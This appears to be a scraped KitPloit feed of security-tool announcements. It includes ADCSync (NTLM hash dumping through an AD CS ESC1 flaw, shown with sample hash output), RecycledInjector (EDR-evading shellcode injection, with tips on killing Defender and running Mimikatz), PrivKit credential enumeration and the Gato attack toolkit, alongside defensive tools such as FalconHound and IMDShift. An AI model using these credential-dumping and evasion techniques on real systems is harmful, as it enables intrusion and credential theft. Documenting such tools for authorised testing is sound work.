    100%|β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 105/105 [02:18<00:00, 1.32s/it]
    THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::
    THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::
    THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::
    THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::
    THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::
    THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::
    THEGRID.LO CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::
    THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::
    THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::

    Introduction

    ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.

    Installation

    git clone https://github.com/JPG0mez/adcsync.git
    cd adcsync
    pip3 install -r requirements.txt

    Usage

    To use this tool we need the following things:

    1. Valid Domain Credentials
    2. A user list from a bloodhound dump that will be passed in.
    3. A template vulnerable to ESC1 (Found with Certipy find)
    # python3 adcsync.py --help
    ___ ____ ___________
    / | / __ \/ ____/ ___/__ ______ _____
    / /| | / / / / / \__ \/ / / / __ \/ ___/
    / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__
    /_/ |_/_____/\____//____/\__, /_/ /_/\___/
    /____/

    Usage: adcsync.py [OPTIONS]

    Options:
    -f, --file TEXT Input User List JSON file from Bloodhound [required]
    -o, --output TEXT NTLM Hash Output file [required]
    -ca TEXT Certificate Authority [required]
    -dc-ip TEXT IP Address of Domain Controller [required]
    -u, --user TEXT Username [required]
    -p, --password TEXT Password [required]
    -template TEXT Template Name vulnerable to ESC1 [required]
    -target-ip TEXT IP Address of th e target machine [required]
    --help Show this message and exit.

    TODO

    • Support alternative authentication methods such as NTLM hashes and ccache files
    • Automatically run "certipy find" to find and grab templates vulnerable to ESC1
    • Add jitter and sleep options to avoid detection
    • Add type validation for all variables

    Acknowledgements

    • puzzlepeaches: Telling me to hurry up and write this
    • ly4k: For Certipy
    • WazeHell: For the script to set up the vulnerable AD environment used for testing


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of Blo odHound In A More Automated Fashion

    By: Zion3R β€” January 18th 2024 at 11:30


    FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

    One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

    One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

    This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

    Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.


    Other examples where FalconHound can be used:

    • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
    • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
    • Adding CVE information and whether there is a public exploit available to the graph.
    • All kinds of Azure activities.
    • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
    • Adding new users, groups and computers to the graph.
    • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

    The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

    A blog detailing more on why we developed it and some use case examples can be found here

    Index:

    Supported data sources and targets

    FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

    Currently, FalconHound supports the following data sources and or targets:

    • Azure Sentinel
    • Azure Sentinel Watchlists
    • Splunk
    • Microsoft Defender for Endpoint
    • Neo4j
    • MS Graph API (early stage)
    • CSV files

    Additional data sources and targets are planned for the future.

    At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


    Installation

    Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.

    Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.

    The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.

    Requirements

    • BloodHound, or at least the Neo4j database for now.
    • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
    • Credentials for each endpoint you want to talk to, with the required permissions.

    Configuration

    FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


    Usage

    Default run

    To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

    ./falconhound -go

    List all enabled actions

    To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

    ./falconhound -actionlist -go

    Run with a select set of actions

    To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

    ./falconhound -ids action1,action2,action3 -go

    Run with a different config file

    By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

    ./falconhound -go -config /path/to/config.yml

    Run with a different actions folder

    By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

    ./falconhound -go -actions-dir /path/to/actions

    Run with credentials from a keyvault

    By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.

    ./falconhound -go -keyvault

    Actions

    Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.

    Action folder structure

    The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

    The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

    Action files

    All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

    There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

    While most items will be fairly self explanatory,there are some important things to note about actions:

    Enabled

    As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

    Enabled: true

    Debug

    This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

    Debug: false

    Query

    The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

    Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

    MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
    RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}

    Targets

    Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

    CSV

      - Name: CSV
    Enabled: true
    Path: path/to/filename.csv

    Neo4j

    The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.

      - Name: Neo4j
    Enabled: true
    Query: |
    MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
    Parameters:
    Computer: Computer
    TargetUserSid: TargetUserSid
    Timestamp: Timestamp

    The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.

    Sentinel

    The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

    This is why also query output needs to be controlled, you might otherwise flood your target.

      - Name: Sentinel
    Enabled: true

    Sentinel Watchlists

    The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

     - Name: Watchlist
    Enabled: true
    WatchlistName: FH_MDE_Exploitable_Machines
    DisplayName: MDE Exploitable Machines
    SearchKey: DeviceName
    Overwrite: true

    The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

    The SearchKey field is the column that will be used as the search key.

    The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

    Splunk

    Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

      - Name: Splunk
    Enabled: true

    Azure Data Explorer

    Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

      - Name: ADX
    Enabled: true
    Table: "name"

    Extensions to the graph

    Relationship: HadSession

    Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession. The relationship will have the following properties:

    {
    "till": "2021-08-31T14:00:00Z",
    "source": "falconhound",
    "reason": "logoff",
    }

    This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.

    Properties

    FalconHound will add the following properties to nodes in the graph:

    Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids

    Credential management

    The currently supported ways of providing FalconHound with credentials are:

    • Via the config.yml file on disk.
    • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
    • Mixed mode.

    Config.yml

    The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.

    The required permissions for your AppID/AppSecret are listed here.

    Keyvault

    A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.

    The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.

    The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

    SentinelAppSecret
    SentinelAppID
    SentinelTenantID
    SentinelTargetTable
    SentinelResourceGroup
    SentinelSharedKey
    SentinelSubscriptionID
    SentinelWorkspaceID
    SentinelWorkspaceName
    MDETenantID
    MDEAppID
    MDEAppSecret
    Neo4jUri
    Neo4jUsername
    Neo4jPassword
    GraphTenantID
    GraphAppID
    GraphAppSecret
    AdxTenantID
    AdxAppID
    AdxAppSecret
    AdxClusterURL
    AdxDatabase
    SplunkUrl
    SplunkApiToken
    SplunkIndex
    SplunkApiPort
    SplunkHecToken
    SplunkHecPort
    BHUrl
    BHTokenID
    BHTokenKey
    LogScaleUrl
    LogScaleToken
    LogScaleRepository

    Once configured you can add the -keyvault parameter while starting FalconHound.

    Mixed mode / fallback

    When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.

    Deployment

    FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

    All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.

    Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.

    Sharphound / Azurehound

    While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

    It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.

    License

    This project is licensed under the BSD3 License - see the LICENSE file for details.

    This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Windiff - Web-based Tool That Allows Comparing Symbol, Type And Syscall Information Of Microsoft Windows Binaries Across Different Versions Of The OS

    By: Zion3R β€” November 30th 2023 at 11:30


    WinDiff is an open-source web-based tool that allows browsing and comparing symbol, type and syscall information of Microsoft Windows binaries across different versions of the operating system. The binary database is automatically updated to include information from the latest Windows updates (including Insider Preview).

    It was inspired by ntdiff and made possible with the help of Winbindex.


    How It Works

    WinDiff is made of two parts: a CLI tool written in Rust and a web frontend written in TypeScript using the Next.js framework.

    The CLI tool is used to generate compressed JSON databases out of a configuration file and relies on Winbindex to find and download the required PEs (and PDBs). Types are reconstructed using resym. The idea behind the CLI tool is to be able to easily update and regenerate databases as new versions of Windows are released. The CLI tool's code is in the windiff_cli directory.

    The frontend is used to visualize the data generated by the CLI tool, in a user-friendly way. The frontend follows the same principle as ntdiff, as it allows browsing information extracted from official Microsoft PEs and PDBs for certain versions of Microsoft Windows and also allows comparing this information between versions. The frontend's code is in the windiff_frontend directory.

    A scheduled GitHub action fetches new updates from Winbindex every day and updates the configuration file used to generate the live version of WinDiff. Currently, because of (free plans) storage and compute limitations, only KB and Insider Preview updates less than one year old are kept for the live version. You can of course rebuild a local version of WinDiff yourself, without those limitations if you need to. See the next section for that.

    Note: Winbindex doesn't provide unique download links for 100% of the indexed files, so it might happen that some PEs' information are unavailable in WinDiff because of that. However, as soon as these PEs are on VirusTotal, Winbindex will be able to provide unique download links for them and they will then be integrated into WinDiff automatically.

    How to Build

    Prerequisites

    • Rust 1.68 or superior
    • Node.js 16.8 or superior

    Command-Line

    The full build of WinDiff is "self-documented" in ci/build_frontend.sh, which is the build script used to build the live version of WinDiff. Here's what's inside:

    # Resolve the project's root folder
    PROJECT_ROOT=$(git rev-parse --show-toplevel)

    # Generate databases
    cd "$PROJECT_ROOT/windiff_cli"
    cargo run --release "$PROJECT_ROOT/ci/db_configuration.json" "$PROJECT_ROOT/windiff_frontend/public/"

    # Build the frontend
    cd "$PROJECT_ROOT/windiff_frontend"
    npm ci
    npm run build

    The configuration file used to generate the data for the live version of WinDiff is located here: ci/db_configuration.json, but you can customize it or use your own. PRs aimed at adding new binaries to track in the live configuration are welcome.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    RecycledInjector - Native Syscalls Shellcode Injector

    By: Zion3R β€” October 12th 2023 at 18:55


    (Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.

    To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.

    Important to also note that the fully undetected part refers to the loading of the shellcode, however, the shellcode will still be subject to behavior monotoring, thus make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz which features DInvoke instead of Mimikatz).


    Usage

    .\RecycledInjector.exe <path_to_shellcode_file>

    Proof of Concept

    This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.

    On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Caracal - Static Analyzer For Starknet Smart Contracts

    By: Zion3R β€” October 6th 2023 at 11:30


    Caracal is a static analyzer tool over the SIERRA representation for Starknet smart contracts.

    Features

    • Detectors to detect vulnerable Cairo code
    • Printers to report information
    • Taint analysis
    • Data flow analysis framework
    • Easy to run in Scarb projects

    Installation

    Precompiled binaries

    Precompiled binaries are available on our releases page. If you are using Cairo compiler 1.x.x uses the binary v0.1.x otherwise if you are using the Cairo compiler 2.x.x uses v0.2.x.

    Building from source

    You need the Rust compiler and Cargo. Building from git:

    cargo install --git https://github.com/crytic/caracal --profile release --force

    Building from a local copy:

    git clone https://github.com/crytic/caracal
    cd caracal
    cargo install --path . --profile release --force

    Usage

    List detectors:

    caracal detectors

    List printers:

    caracal printers

    Standalone

    To use with a standalone cairo file you need to pass the path to the corelib library either with the --corelib cli option or by setting the CORELIB_PATH environment variable. Run detectors:

    caracal detect path/file/to/analyze --corelib path/to/corelib/src

    Run printers:

    caracal print path/file/to/analyze --printer printer_to_use --corelib path/to/corelib/src

    Scarb

    If you have a project that uses Scarb you need to add the following in Scarb.toml:

    [[target.starknet-contract]]
    sierra = true

    [cairo]
    sierra-replace-ids = true

    Then pass the path to the directory where Scarb.toml resides. Run detectors:

    caracal detect path/to/dir

    Run printers:

    caracal print path/to/dir --printer printer_to_use

    Detectors

    Num Detector What it Detects Impact Confidence Cairo
    1 controlled-library-call Library calls with a user controlled class hash High Medium 1 & 2
    2 unchecked-l1-handler-from Detect L1 handlers without from address check High Medium 1 & 2
    3 felt252-overflow Detect user controlled operations with felt252 type, which is not overflow safe High Medium 1 & 2
    4 reentrancy Detect when a storage variable is read before an external call and written after Medium Medium 1 & 2
    5 read-only-reentrancy Detect when a view function read a storage variable written after an external call Medium Medium 1 & 2
    6 unused-events Events defined but not emitted Medium Medium 1 & 2
    7 unused-return Unused return values Medium Medium 1 & 2
    8 unenforced-view Function has view decorator but modifies state Medium Medium 1
    9 unused-arguments Unused arguments Low Medium 1 & 2
    10 reentrancy-benign Detect when a storage variable is written after an external call but not read before Low Medium 1 & 2
    11 reentrancy-events Detect when an event is emitted after an external call leading to out-of-order events Low Medium 1 & 2
    12 dead-code Private functions never used Low Medium 1 & 2

    The Cairo column represent the compiler version(s) for which the detector is valid.

    Printers

    • cfg: Export the CFG of each function to a .dot file
    • callgraph: Export function call graph to a .dot file

    How to contribute

    Check the wiki on the following topics:

    Limitations

    • Inlined functions are not handled correctly.
    • Since it's working over the SIERRA representation it's not possible to report where an error is in the source code but we can only report SIERRA instructions/what's available in a SIERRA program.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Callisto - An Intelligent Binary Vulnerability Analysis Tool

    By: Zion3R β€” September 20th 2023 at 11:30


    Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the psuedo code output looking for potential security vulnerabilities in that pseudo c code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.


    This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation with Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.

    For those looking to just leverage the tool as a quick headless decompiler, the output.c file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed.

    I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep

    Requirements:

    • If you want to use the GPT-3.5-Turbo feature, you must create an API token on OpenAI and save to the config.txt file in this folder
    • Ghidra
    • Semgrep - pip install semgrep
    • requirements.txt - pip install -r requirements.txt
    • Ensure the correct path to your Ghidra directory is set in the config.txt file

    To Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>

    • -ai => enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file
    • -o => define an output file, if you want to save the output
    • -ai and -o are optional parameters
    • -all will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai flag
    • Ex. python callisto.py -b vulnProgram.exe -ai -o results.txt
    • Ex. (Running all functions through AI Analysis):
      python callisto.py -b vulnProgram.exe -ai -all -o results.txt

    Program Output Example:



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    IMDShift - Automates Migration Process Of Workloads To IMDSv2 To Avoid SSRF Attacks

    By: Zion3R β€” August 4th 2023 at 12:30


    AWS workloads that rely on the metadata endpoint are vulnerable to Server-Side Request Forgery (SSRF) attacks. IMDShift automates the migration process of all workloads to IMDSv2 with extensive capabilities, which implements enhanced security measures to protect against these attacks.


    Features

    • Detection of AWS workloads that rely on the metadata endpoint amongst various services which includes - EC2, ECS, EKS, Lightsail, AutoScaling Groups, Sagemaker Notebooks, Beanstalk (in progress)
    • Simple and intuitive command-line interface for easy usage
    • Automated migration of all workloads to IMDSv2
    • Standalone hop limit update for compatible resources
    • Standalone metadata endpoint enable operation for compatible resources
    • Detailed logging of migration process
    • Identify resources that are using IMDSv1, using the MetadataNoToken CloudWatch metric across specified regions
    • Built-in Service Control Policy (SCP) recommendations

    IMDShift vs. Metabadger

    Metabadger is an older tool that was used to facilitate migration of AWS EC2 workloads to IMDSv2.

    IMDShift makes several improvements on Metabadger's capabilities:

    • IMDShift allows migration of standalone services and not all EC2 instances, blindly. For example, the user can choose to only migrate EKS workloads, also some services such as Lightsail, do not fall under EC2 umbrella, IMDShift has the capability to migrate such resources as well.
    • IMDShift allows standalone enabling of metadata endpoint for resources it is currently disabled, without having to perform migration on the remaining resources
    • IMDShift allows standalone update response hop limit for resources where metadata endpoint is enabled, without having to perform migration on the remaining resources
    • IMDShift allows, not only the option to include specific regions, but also skip specified regions
    • IMDShift not only allows usage of AWS profiles, but also can assume roles, to work
    • IMDShift helps with post-migration activities, by suggesting various Service Control Policies (SCPs) to implement.

    Installation

    Production Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install .

    Development Installation

    git clone https://github.com/ayushpriya10/imdshift.git
    cd imdshift/
    python3 -m pip install -e .

    Usage

    Options:
    --services TEXT This flag specifies services scan for IMDSv1
    usage from [EC2, Sagemaker, ASG (Auto Scaling
    Groups), Lightsail, ECS, EKS, Beanstalk].
    Format: "--services EC2,Sagemaker,ASG"
    --include-regions TEXT This flag specifies regions explicitly to
    include scan for IMDSv1 usage. Format: "--
    include-regions ap-south-1,ap-southeast-1"
    --exclude-regions TEXT This flag specifies regions to exclude from the
    scan explicitly. Format: "--exclude-regions ap-
    south-1,ap-southeast-1"
    --migrate This boolean flag enables IMDShift to perform
    the migration, defaults to "False". Format: "--
    migrate"
    -- update-hop-limit INTEGER This flag specifies if the hop limit should be
    updated and with what value. It is recommended
    to set the hop limit to "2" to enable containers
    to be able to work with the IMDS endpoint. If
    this flag is not passed, hop limit is not
    updated during migration. Format: "--update-hop-
    limit 3"
    --enable-imds This boolean flag enables IMDShift to enable the
    metadata endpoint for resources that have it
    disabled and then perform the migration,
    defaults to "False". Format: "--enable-imds"
    --profile TEXT This allows you to use any profile from your
    ~/.aws/credentials file. Format: "--profile
    prod-env"
    --role-arn TEXT This flag let's you assume a role via aws sts.
    Format: "--role-arn
    arn:aws:sts::111111111:role/John"
    --print-scps This boolean flag prints Service Control
    Policies (SCPs) that can be used to control IMDS
    usage, like deny access for credentials fetched
    from IMDSv2 or deny creation of resources with
    IMDSv1, defaults to "False". Format: "--print-
    scps"
    --check-imds-usage This boolean flag launches a scan to identify
    how many instances are using IMDSv1 in specified
    regions, during the last 30 days, by using the
    "MetadataNoToken" CloudWatch metric, defaults to
    "False". Format: "--check-imds-usage"
    --help Show this message and exit.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PrivKit - Simple Beacon Object File That Detects Privilege Escalation Vulnerabilities Caused By Misconfigurations On Windows OS

    By: Zion3R β€” August 3rd 2023 at 12:30


    PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.


    PrivKit detects following misconfigurations

     Checks for Unquoted Service Paths
    Checks for Autologon Registry Keys
    Checks for Always Install Elevated Registry Keys
    Checks for Modifiable Autoruns
    Checks for Hijackable Paths
    Enumerates Credentials From Credential Manager
    Looks for current Token Privileges

    Usage

    [03/20 00:51:06] beacon> privcheck
    [03/20 00:51:06] [*] Priv Esc Check Bof by @merterpreter
    [03/20 00:51:06] [*] Checking For Unquoted Service Paths..
    [03/20 00:51:06] [*] Checking For Autologon Registry Keys..
    [03/20 00:51:06] [*] Checking For Always Install Elevated Registry Keys..
    [03/20 00:51:06] [*] Checking For Modifiable Autoruns..
    [03/20 00:51:06] [*] Checking For Hijackable Paths..
    [03/20 00:51:06] [*] Enumerating Credentials From Credential Manager..
    [03/20 00:51:06] [*] Checking For Token Privileges..
    [03/20 00:51:06] [+] host called home, sent: 10485 bytes
    [03/20 00:51:06] [+] received output:
    Unquoted Service Path Check Result: Vulnerable service path found: c:\program files (x86)\grasssoft\macro expert\MacroService.exe

    Simply load the cna file and type "privcheck"
    If you want to compile by yourself you can use:
    make all
    or
    x86_64-w64-mingw32-gcc -c cfile.c -o ofile.o

    If you want to look for just one misconf you can use object file with "inline-execute" for example
    inline-execute /path/tokenprivileges.o

    Acknowledgement

    Mr.Un1K0d3r - Offensive Coding Portal
    https://mr.un1k0d3r.world/portal/

    Outflank - C2-Tool-Collection
    https://github.com/outflanknl/C2-Tool-Collection

    dtmsecurity - Beacon Object File (BOF) Creation Helper
    https://github.com/dtmsecurity/bof_helper

    Microsoft :)
    https://learn.microsoft.com/en-us/windows/win32/api/

    HsTechDocs by HelpSystems(Fortra)
    https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_how-to-develop.htm



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Gato - GitHub Self-Hosted Runner Enumeration And Attack Tool

    By: Zion3R β€” June 25th 2023 at 12:30


    Gato, or GitHub Attack Toolkit, is an enumeration and attack tool that allows both blue teamers and offensive security practitioners to evaluate the blast radius of a compromised personal access token within a GitHub organization.

    The tool also allows searching for and thoroughly enumerating public repositories that utilize self-hosted runners. GitHub recommends that self-hosted runners only be utilized for private repositories, however, there are thousands of organizations that utilize self-hosted runners.


    Who is it for?

    • Security engineers who want to understand the level of access a compromised classic PAT could provide an attacker
    • Blue teams that want to build detections for self-hosted runner attacks
    • Red Teamers
    • Bug bounty hunters who want to try and prove RCE on organizations that are utilizing self-hosted runners

    Features

    • GitHub Classic PAT Privilege Enumeration
    • GitHub Code Search API-based enumeration
